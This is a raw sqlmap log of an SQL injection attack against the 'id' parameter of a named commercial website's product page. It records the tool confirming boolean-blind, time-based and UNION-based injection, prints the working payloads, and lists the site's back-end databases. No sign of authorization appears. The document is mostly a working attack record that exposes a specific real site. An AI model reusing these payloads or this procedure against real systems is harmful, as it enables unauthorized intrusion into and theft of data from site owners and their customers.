http://www.womenlivingnaturally.com/product.php?id=21
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.151#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:21:40 /2019-05-30/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[06:21:41] [INFO] testing connection to the target URL
[06:21:43] [INFO] heuristics detected web page charset 'ISO-8859-2'
[06:21:43] [INFO] checking if the target is protected by some kind of WAF/IPS
[06:21:45] [INFO] testing if the target URL content is stable
[06:21:47] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[06:21:47] [INFO] testing if GET parameter 'id' is dynamic
[06:21:47] [INFO] GET parameter 'id' appears to be dynamic
[06:21:49] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[06:21:50] [INFO] testing for SQL injection on GET parameter 'id'
[06:21:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:22:48] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[06:22:58] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[06:22:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[06:22:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[06:22:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[06:22:59] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[06:22:59] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[06:23:00] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[06:23:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[06:23:00] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[06:23:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[06:23:01] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[06:23:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[06:23:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[06:23:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[06:23:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[06:23:03] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[06:23:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[06:23:04] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[06:23:04] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[06:23:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[06:23:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[06:23:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[06:23:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[06:23:04] [INFO] testing 'MySQL inline queries'
[06:23:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[06:23:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[06:23:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[06:23:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[06:23:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[06:23:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[06:23:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[06:23:30] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[06:23:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:23:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:23:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[06:23:37] [INFO] target URL appears to have 21 columns in query
[06:23:38] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[?1049h[22;0;0t[1;24r(B[m[4l[?7h[H[2J[24;1H[?1049l[23;0;0t[?1l>GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 104 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=21' AND 3184=3184-- IiRE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=21' AND (SELECT 3725 FROM (SELECT(SLEEP(5)))aVVq)-- CkYg

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=21' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a766b71,0x70677165555343616e4151474b785a73795359566373744a717468465179767a7156764d706a5745,0x71786a6a71),NULL,NULL,NULL-- yyfQ
---
[06:23:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[06:23:38] [INFO] fetching database names
[06:23:39] [INFO] used SQL query returns 3 entries
[06:23:39] [INFO] retrieved: 'information_schema'
[06:23:39] [INFO] retrieved: 'women'
[06:23:40] [INFO] retrieved: 'women2'
available databases [3]:
[*] information_schema
[*] women
[*] women2

[06:23:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.womenlivingnaturally.com'

[*] ending @ 06:23:40 /2019-05-30/

